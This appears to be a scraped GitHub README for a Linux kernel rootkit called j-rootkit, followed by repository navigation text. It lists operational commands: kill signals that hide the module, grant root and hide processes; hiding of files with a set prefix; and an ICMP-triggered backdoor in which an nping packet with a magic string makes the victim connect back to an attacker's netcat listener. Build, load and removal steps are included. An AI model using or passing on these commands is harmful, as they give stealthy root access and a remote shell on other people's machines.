j-rootkit

Tested on Ubuntu 22.04 and Debian 12.4

Usage

Hide/Show rootkit in the list of loaded modules ($ lsmod)

$ kill -63 1

When installed it starts hidden. You can only remove it when it's unhidden.

Become root:

$ kill -64 1

Hide process with pid

$ kill -62 <pid>

Unhide process with pid

$ kill -61 <pid>

It also hides every file and directory with prefix rootk_.

Backdoor

On attacker machine start netcat listener on some port:

$ nc -lnvp <port>

Send ICMP ping to victim:

$ nping --icmp -c 1 -dest-ip <victim-ip> --data-string 'wA@2mC!dq <attacker-ip> <port>'

Install

Compile module and backdoor:

$ make
$ make install

Load module:

$ sudo insmod build/rootkit.ko

Remove

Make sure the module is visible in lsmod. To toggle visibility do kill -63 1. Then, remove it with:

$ sudo rmmod rootkit.ko

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commit
build		build
Makefile		Makefile
README.md		README.md
backdoor-icmp.c		backdoor-icmp.c
rootkit.c		rootkit.c

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

j-rootkit

Usage

Backdoor

Install

Remove

References

About

Uh oh!

Releases

Packages

Languages

JakeGinesin/j-rootkit

Folders and files

Latest commit

History

Repository files navigation

j-rootkit

Usage

Backdoor

Install

Remove

References

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages